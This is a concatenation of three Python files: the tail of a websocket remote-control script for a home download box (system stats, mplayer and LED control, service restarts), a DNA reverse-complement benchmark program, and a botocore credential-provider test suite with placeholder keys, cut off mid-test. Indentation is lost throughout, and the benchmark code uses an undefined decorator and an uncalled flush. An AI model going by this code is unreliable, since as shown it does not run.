#Return Memory information (unit=Mb) in a list
def get_RAM_info():
RAMinfo = commands.getoutput("free -m | grep 'Mem' | awk '{print \"Memory||\"$2\"M||\"$3\"M||\"$4\"M\"}'")
return RAMinfo
#Return information about disk space as a list (unit included)
def get_Disk_info():
DiskSpace = commands.getoutput("df -h / | grep 'dev' | awk '{print \"Disk||\"$2\"||\"$3\"||\"$4}'")
return DiskSpace
#The statue of download
def download_statue(x):
base = "/media/udisk/TDDOWNLOAD"
Downloading = ["Downloading"]
Completed = ["Completed"]
cur_list = os.listdir(base)
for item in cur_list:
full_path = os.path.join(base, item)
if os.path.isfile(full_path):
if item.endswith(".td"):
Downloading.append(os.path.splitext(item)[0])
elif item.endswith(".cfg"):
pass
else:
Completed.append(item)
if x==0:
return "||".join(Downloading)
if x==1:
global mark_num
mark_num = len(Completed)-1
return "||".join(Completed)
#Play Movie
def Play_Mov(num):
listStr = download_statue(1)
global mark_num
if mark_num < num:
return "Hello"
playList = listStr.split('||')
playFile = os.path.join( "/media/udisk/TDDOWNLOAD", playList[num] )
commands.getoutput("echo \"loadfile %s\" > /tmp/fifofile" % playFile )
playInfo = "Playing||%s" % ( playList[num] )
return playInfo
#Connect to SAE Channel
def get_url():
while True:
try:
req = urllib2.Request("http://1.mylovefish.sinaapp.com/bananapi.php")
response = urllib2.urlopen(req)
the_page = response.read()
url = the_page.strip()
ws = websocket.create_connection(url)
print url
ws.send("Hello")
pause_flag = 0
volume_flag = 60
playInfoBak = ""
while True:
content = "Hello"
str = ws.recv()
tmp = str.split('||');
from_user = tmp[0]
buf = tmp[1]
ws.send("Hello")
if buf == "CPU":
content = get_CPU_info()
elif buf == "Memory":
content = get_RAM_info()
elif buf == "Disk":
content = get_Disk_info()
elif buf == "Downloading":
content = download_statue(0)
elif buf == "Completed":
content = download_statue(1)
elif buf == "Restart":
t = threading.Thread(target=Restart,args=(ws,from_user))
t.setDaemon(True)
t.start()
elif buf == "Close":
commands.getoutput("service xunlei stop")
content = "Close"
elif buf == "ONLED":
commands.getoutput("echo 1 > /sys/class/gpio/gpio18/value")
content = "LEDON"
elif buf == "OFFLED":
commands.getoutput("echo 0 > /sys/class/gpio/gpio18/value")
content = "LEDOFF"
elif buf == "lightdm":
commands.getoutput("ps aux |grep 'mplayer'|grep -v grep|awk '{print $2}'|xargs kill -9")
commands.getoutput("service lightdm restart")
content = "lightdm"
#Play Moviei Control
elif buf.isdigit():
num = int(buf)
content = Play_Mov(num)
playInfoBak = content
play_flag = 1
elif buf == "Play2Pause":
if pause_flag == 0:
commands.getoutput("echo \"pause\" > /tmp/fifofile")
pause_flag = 1
content = "Play2Pause"
elif buf == "Pause2Play":
if pause_flag == 1:
commands.getoutput("echo \"pause\" > /tmp/fifofile")
pause_flag = 0
content = "Pause2Play"
elif buf == "StopPlay":
commands.getoutput("echo \"stop\" > /tmp/fifofile")
content = "StoppedPlay"
elif buf == "volumeUp":
volume_flag += 10
commands.getoutput("echo \"volume %d 1\" > /tmp/fifofile" % volume_flag )
content = "volumeUp"
elif buf == "volumeDn":
volume_flag -= 10
commands.getoutput("echo \"volume %d 1\" > /tmp/fifofile" % volume_flag )
content = "volumeDn"
elif buf == "fullscreen":
commands.getoutput("echo \"vo_fullscreen 1\" > /tmp/fifofile")
content = "fullscreen"
elif buf == "exitscreen":
commands.getoutput("echo \"vo_fullscreen 0\" > /tmp/fifofile")
content = "exitscreen"
elif buf == "Playing":
content = playInfoBak
else:
pass
ws.send(from_user+"||"+content)
print content
except BaseException, e:
get_url()
def Restart(ws,from_user):
ws.send(from_user+"||Restarting")
commands.getoutput("service xunlei start")
ws.send(from_user+"||Restart")
if __name__=='__main__':
while True:
try:
get_url()
except BaseException, e:
get_url()
|
reverse_complement_2.py | # The Computer Language Benchmarks Game
# https://salsa.debian.org/benchmarksgame-team/benchmarksgame/
#
# contributed by Joerg Baumann
from sys import stdin, stdout
# from os import cpu_count
from itertools import starmap
reverse_translation = bytes.maketrans(
b'ABCDGHKMNRSTUVWYabcdghkmnrstuvwy',
b'TVGHCDMKNYSAABWRTVGHCDMKNYSAABWR')
def reverse_complement(header, sequence):
t = sequence.translate(reverse_translation, b'\n\r ')
output = bytearray()
trailing_length = len(t) % 60
if trailing_length:
output += b'\n' + t[:trailing_length]
for i in range(trailing_length, len(t), 60):
output += b'\n' + t[i:i+60]
return header, output[::-1]
# @resumable
def read_sequences(file):
for line in file:
if line[0] == ord('>'):
header = line
sequence = bytearray()
for line in file:
if line[0] == ord('>'):
yield header, sequence
header = line
sequence = bytearray()
else:
sequence += line
yield header, sequence
break
# Not used
# def reverse_and_print_task(q, c, v):
# while True:
# i = q.get()
# if i == None:
# break
# h, r = reverse_complement(*data[i])
# with c:
# while i != v.value:
# c.wait()
# write(h)
# write(r)
# flush()
# with c:
# v.value = i + 1
# c.notify_all()
if __name__ == '__main__':
write = stdout.buffer.write
flush = stdout.buffer.flush
# Not used
s = read_sequences(stdin.buffer)
data = next(s)
# if cpu_count() == 1 or len(data[1]) < 1000000:
# from itertools import starmap
@resumable(remove_nested=True, lower_yield_from=True)
def merge(v, g):
yield v
yield from g
for h, r in starmap(reverse_complement, merge(data, s)):
write(h)
write(r)
flush
# Not used
# else:
# from multiprocessing import Process, Queue, Value, Condition
# from ctypes import c_int
# data = [data] + list(s)
# q, c, v = (Queue(), Condition(), Value(c_int, 0))
# processes = [Process(target=reverse_and_print_task, args=(q, c, v))
# for _ in range(min(len(data), cpu_count()))]
# for p in processes: p.start()
# for i in range(len(data)): q.put(i)
# for p in processes: q.put(None)
# for p in processes: p.join()
|
test_credentials.py | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import uuid
import threading
import os
import math
import time
import mock
import tempfile
import shutil
from datetime import datetime, timedelta
import sys
from dateutil.tz import tzlocal
from botocore.exceptions import CredentialRetrievalError
from tests import unittest, IntegerRefresher, BaseEnvVar, random_chars
from tests import temporary_file, StubbedSession, SessionHTTPStubber
from botocore import UNSIGNED
from botocore.credentials import EnvProvider, ContainerProvider
from botocore.credentials import InstanceMetadataProvider
from botocore.credentials import Credentials, ReadOnlyCredentials
from botocore.credentials import AssumeRoleProvider, ProfileProviderBuilder
from botocore.credentials import CanonicalNameCredentialSourcer
from botocore.credentials import DeferredRefreshableCredentials
from botocore.credentials import create_credential_resolver
from botocore.credentials import JSONFileCache
from botocore.credentials import SSOProvider
from botocore.config import Config
from botocore.session import Session
from botocore.exceptions import InvalidConfigError, InfiniteLoopConfigError
from botocore.stub import Stubber
from botocore.utils import datetime2timestamp
class TestCredentialRefreshRaces(unittest.TestCase):
def assert_consistent_credentials_seen(self, creds, func):
collected = []
self._run_threads(20, func, collected)
for creds in collected:
# During testing, the refresher uses it's current
# refresh count as the values for the access, secret, and
# token value. This means that at any given point in time,
# the credentials should be something like:
#
# ReadOnlyCredentials('1', '1', '1')
# ReadOnlyCredentials('2', '2', '2')
# ...
# ReadOnlyCredentials('30', '30', '30')
#
# This makes it really easy to verify we see a consistent
# set of credentials from the same time period. We just
# check if all the credential values are the same. If
# we ever see something like:
#
# ReadOnlyCredentials('1', '2', '1')
#
# We fail. This is because we're using the access_key
# from the first refresh ('1'), the secret key from
# the second refresh ('2'), and the token from the
# first refresh ('1').
self.assertTrue(creds[0] == creds[1] == creds[2], creds)
def assert_non_none_retrieved_credentials(self, func):
collected = []
self._run_threads(50, func, collected)
for cred in collected:
self.assertIsNotNone(cred)
def _run_threads(self, num_threads, func, collected):
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=func, args=(collected,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_has_no_race_conditions(self):
creds = IntegerRefresher(
creds_last_for=2,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(4000):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
start = time.time()
self.assert_consistent_credentials_seen(creds, _run_in_thread)
end = time.time()
# creds_last_for = 2 seconds (from above)
# So, for example, if execution time took 6.1 seconds, then
# we should see a maximum number of refreshes being (6 / 2.0) + 1 = 4
max_calls_allowed = math.ceil((end - start) / 2.0) + 1
self.assertTrue(creds.refresh_counter <= max_calls_allowed,
"Too many cred refreshes, max: %s, actual: %s, "
"time_delta: %.4f" % (max_calls_allowed,
creds.refresh_counter,
(end - start)))
def test_no_race_for_immediate_advisory_expiration(self):
creds = IntegerRefresher(
creds_last_for=1,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(100):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
self.assert_consistent_credentials_seen(creds, _run_in_thread)
def test_no_race_for_initial_refresh_of_deferred_refreshable(self):
def get_credentials():
expiry_time = (
datetime.now(tzlocal()) + timedelta(hours=24)).isoformat()
return {
'access_key': 'my-access-key',
'secret_key': 'my-secret-key',
'token': 'my-token',
'expiry_time': expiry_time
}
deferred_creds = DeferredRefreshableCredentials(
get_credentials, 'fixed')
def _run_in_thread(collected):
frozen = deferred_creds.get_frozen_credentials()
collected.append(frozen)
self.assert_non_none_retrieved_credentials(_run_in_thread)
class BaseAssumeRoleTest(BaseEnvVar):
def setUp(self):
super(BaseAssumeRoleTest, self).setUp()
self.tempdir = tempfile.mkdtemp()
self.config_file = os.path.join(self.tempdir, 'config')
self.environ['AWS_CONFIG_FILE'] = self.config_file
self.environ['AWS_SHARED_CREDENTIALS_FILE'] = str(uuid.uuid4())
def tearDown(self):
shutil.rmtree(self.tempdir)
super(BaseAssumeRoleTest, self).tearDown()
def some_future_time(self):
timeobj = datetime.now(tzlocal())
return timeobj + timedelta(hours=24)
def create_assume_role_response(self, credentials, expiration=None):
if expiration is None:
expiration = self.some_future_time()
response = {
'Credentials': {
'AccessKeyId': credentials.access_key,
'SecretAccessKey': credentials.secret_key,
'SessionToken': credentials.token,
'Expiration': expiration
},
'AssumedRoleUser': {
'AssumedRoleId': 'myroleid',
'Arn': 'arn:aws:iam::1234567890:user/myuser'
}
}
return response
def create_random_credentials(self):
return Credentials(
'fake-%s' % random_chars(15),
'fake-%s' % random_chars(35),
'fake-%s' % random_chars(45)
)
def assert_creds_equal(self, c1, c2):
c1_frozen = c1
if not isinstance(c1_frozen, ReadOnlyCredentials):
c1_frozen = c1.get_frozen_credentials()
c2_frozen = c2
if not isinstance(c2_frozen, ReadOnlyCredentials):
c2_frozen = c2.get_frozen_credentials()
self.assertEqual(c1_frozen, c2_frozen)
def write_config(self, config):
with open(self.config_file, 'w') as f:
f.write(config)
class TestAssumeRole(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRole, self).setUp()
self.environ['AWS_ACCESS_KEY_ID'] = 'access_key'
self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key'
self.metadata_provider = self.mock_provider(InstanceMetadataProvider)
self.env_provider = self.mock_provider(EnvProvider)
self.container_provider = self.mock_provider(ContainerProvider)
self.mock_client_creator = mock.Mock(spec=Session.create_client)
self.actual_client_region = None
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
def mock_provider(self, provider_cls):
mock_instance = mock.Mock(spec=provider_cls)
mock_instance.load.return_value = None
mock_instance.METHOD = provider_cls.METHOD
mock_instance.CANONICAL_NAME = provider_cls.CANONICAL_NAME
return mock_instance
def create_session(self, profile=None):
session = StubbedSession(profile=profile)
# We have to set bogus credentials here or otherwise we'll trigger
# an early credential chain resolution.
sts = session.create_client(
'sts',
aws_access_key_id='spam',
aws_secret_access_key='eggs',
)
self.mock_client_creator.return_value = sts
assume_role_provider = AssumeRoleProvider(
load_config=lambda: session.full_config,
client_creator=self.mock_client_creator,
cache={},
profile_name=profile,
credential_sourcer=CanonicalNameCredentialSourcer([
self.env_provider, self.container_provider,
self.metadata_provider
]),
profile_provider_builder=ProfileProviderBuilder(
session,
sso_token_cache=JSONFileCache(self.tempdir),
),
)
stubber = session.stub('sts')
stubber.activate()
component_name = 'credential_provider'
resolver = session.get_component(component_name)
available_methods = [p.METHOD for p in resolver.providers]
replacements = {
'env': self.env_provider,
'iam-role': self.metadata_provider,
'container-role': self.container_provider,
'assume-role': assume_role_provider
}
for name, provider in replacements.items():
try:
index = available_methods.index(name)
except ValueError:
# The provider isn't in the session
continue
resolver.providers[index] = provider
session.register_component(
'credential_provider', resolver
)
return session, stubber
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_environment_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
environment_creds = self.create_random_credentials()
self.env_provider.load.return_value = environment_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.env_provider.load.call_count, 1)
def test_instance_metadata_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Ec2InstanceMetadata\n'
)
self.write_config(config)
metadata_creds = self.create_random_credentials()
self.metadata_provider.load.return_value = metadata_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.metadata_provider.load.call_count, 1)
def test_container_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = EcsContainer\n'
)
self.write_config(config)
container_creds = self.create_random_credentials()
self.container_provider.load.return_value = container_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.container_provider.load.call_count, 1)
def test_invalid_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = CustomInvalidProvider\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_misconfigured_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials().get_frozen_credentials()
def test_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_b_creds = self.create_random_credentials()
profile_b_response = self.create_assume_role_response(profile_b_creds)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_b_response)
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_recursive_assume_role_stops_at_static_creds(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_infinitely_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
)
self.write_config(config)
with self.assertRaises(InfiniteLoopConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_process_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'credential_process = %s\n' % self.credential_process
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# credential process.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': 'spam',
'aws_secret_access_key': 'eggs',
'aws_session_token': None,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, stubber = self.create_session(profile='A')
identity_creds = self.create_random_credentials()
identity_response = self.create_assume_role_response(identity_creds)
stubber.add_response(
'assume_role_with_web_identity',
identity_response,
)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# assume role with web identity call.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': identity_creds.access_key,
'aws_secret_access_key': identity_creds.secret_key,
'aws_session_token': identity_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# The config is split between the profile and the env, we
# should only be looking at the profile so this should raise
# a configuration error.
with self.assertRaises(InvalidConfigError):
session.get_credentials()
def test_sso_source_profile(self):
token_cache_key = 'f395038c92f1828cbb3991d2d6152d326b895606'
cached_token = {
'accessToken': 'a.token',
'expiresAt': self.some_future_time(),
}
temp_cache = JSONFileCache(self.tempdir)
temp_cache[token_cache_key] = cached_token
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'sso_region = us-east-1\n'
'sso_start_url = https://test.url/start\n'
'sso_role_name = SSORole\n'
'sso_account_id = 1234567890\n'
)
self.write_config(config)
session, sts_stubber = self.create_session(profile='A')
client_config = Config(
region_name='us-east-1',
signature_version=UNSIGNED,
)
sso_stubber = session.stub('sso', config=client_config)
sso_stubber.activate()
# The expiration needs to be in milliseconds
expiration = datetime2timestamp(self.some_future_time()) * 1000
sso_role_creds = self.create_random_credentials()
sso_role_response = {
'roleCredentials': {
'accessKeyId': sso_role_creds.access_key,
'secretAccessKey': sso_role_creds.secret_key,
'sessionToken': sso_role_creds.token,
'expiration': int(expiration),
}
}
sso_stubber.add_response('get_role_credentials', sso_role_response)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
sts_stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
sts_stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# SSO get role credentials response
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': sso_role_creds.access_key,
'aws_secret_access_key': sso_role_creds.secret_key,
'aws_session_token': sso_role_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_credential_source_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = token_path
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# We should not get credentials from web-identity configured in the
# environment when the Environment credential_source is set.
# There are no Environment credentials, so this should raise a
# retrieval error.
with self.assertRaises(CredentialRetrievalError):
session.get_credentials()
def test_self_referential_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def create_stubbed_sts_client(self, session):
expected_creds = self.create_random_credentials()
_original_create_client = session.create_client
def create_client_sts_stub(service, *args, **kwargs):
client = _original_create_client(service, *args, **kwargs)
stub = Stubber(client)
response = self.create_assume_role_response(expected_creds)
self.actual_client_region = client.meta.region_name
stub.add_response('assume_role', response)
stub.activate()
return client
return create_client_sts_stub, expected_creds
def test_assume_role_uses_correct_region(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
# Verify that when we configure the session with a specific region
# that we use that region when creating the sts client.
session.set_config_variable('region', 'cn-north-1')
create_client, expected_creds = self.create_stubbed_sts_client(session)
session.create_client = create_client
resolver = create_credential_resolver(session)
provider = resolver.get_provider('assume-role')
creds = provider.load()
self.assert_creds_equal(creds, expected_creds)
self.assertEqual(self.actual_client_region, 'cn-north-1')
class TestAssumeRoleWithWebIdentity(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRoleWithWebIdentity, self).setUp()
self.token_file = os.path.join(self.tempdir, 'token.jwt')
self.write_token('totally.a.token')
def write_token(self, token, path=None):
if path is None:
path = self.token_file
with open(path, 'w') as f:
f.write(token)
def assert_session_credentials(self, expected_params, **kwargs):
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session = StubbedSession(**kwargs)
stubber = session.stub('sts')
stubber.add_response(
'assume_role_with_web_identity',
response,
expected_params
)
stubber.activate()
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = sname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'sname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
def test_assume_role_env_vars(self):
config = (
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = self.token_file
self.environ['AWS_ROLE_SESSION_NAME'] = 'bname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleB',
'RoleSessionName': 'bname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params)
def test_assume_role_env_vars_do_not_take_precedence(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = aname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
different_token = os.path.join(self.tempdir, str(uuid.uuid4()))
self.write_token('totally.different.token', path=different_token)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleC'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = different_token
self.environ['AWS_ROLE_SESSION_NAME'] = 'cname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'aname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
class TestProcessProvider(unittest.TestCase):
def setUp(self):
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
self.environ = os.environ.copy()
self.environ_patch = mock.patch('os.environ', self.environ)
self.environ_patch.start()
def tearDown(self):
self.environ_patch.stop()
def test_credential_process(self):
config = (
'[profile processcreds]\n'
'credential_process = %s\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
credentials = Session(profile='processcreds').get_credentials()
self.assertEqual(credentials.access_key, 'spam')
self.assertEqual(credentials.secret_key, 'eggs')
def test_credential_process_returns_error(self):
config = (
'[profile processcreds]\n'
'credential_process = %s --raise-error\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
session = Session(profile='processcreds')
# This regex validates that there is no substring: b'
# The reason why we want to validate that is that we want to
# make sure that stderr is actually decoded so that in
# exceptional cases the error is properly formatted.
# As for how the regex works:
# `(?!b').` is a negative lookahead, meaning that it will only
# match if it is not followed by the pattern `b'`. Since it is
# followed by a `.` it will match any character not followed by
# that pattern. `((?!hede).)*` does that zero or more times. The
# final pattern adds `^` and `$` to anchor the beginning and end
# of the string so we can know the whole string is consumed.
# Finally `(?s)` at the beginning makes dots match newlines so
# we can handle a multi-line string.
reg = r"(?s)^((?!b').)*$"
with self.assertRaisesRegex(CredentialRetrievalError, reg):
session.get_credentials()
class TestSTSRegional(BaseAssumeRoleTest):
def add_assume_role_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRole'))
def add_assume_role_with_web_identity_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRoleWithWebIdentity'))
def _get_assume_role_body(self, method_name):
expiration = self.some_future_time()
body = (
'<{method_name}Response>'
' <{method_name}Result>'
' <AssumedRoleUser>'
' <Arn>arn:aws:sts::0123456:user</Arn>'
' <AssumedRoleId>AKID:mysession-1567020004</AssumedRoleId>'
' </AssumedRoleUser>'
' <Credentials>'
' <AccessKeyId>AccessKey</AccessKeyId>'
' <SecretAccessKey>SecretKey</SecretAccessKey>'
' <SessionToken>SessionToken</SessionToken>'
' <Expiration>{expiration}</Expiration>'
' </Credentials>'
' </{method_name}Result>'
'</{method_name}Response>'
).format(method_name=method_name, expiration=expiration)
return body.encode('utf-8')
def make_stubbed_client_call_to_region(self, session, stubber, region):
ec2 = session.create_client('ec2', region_name=region)
stubber.add_response(body=b'<DescribeRegionsResponse/>')
ec2.describe_regions()
def test_assume_role_uses_same_region_as_client(self):
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
def test_assume_role_web_identity_uses_same_region_as_client(self):
token_file = os.path.join(self.tempdir, 'token.jwt')
with open(token_file, 'w') as f:
f.write('some-token')
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'web_identity_token_file = %s\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n' % token_file
)
self.write_config(config)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
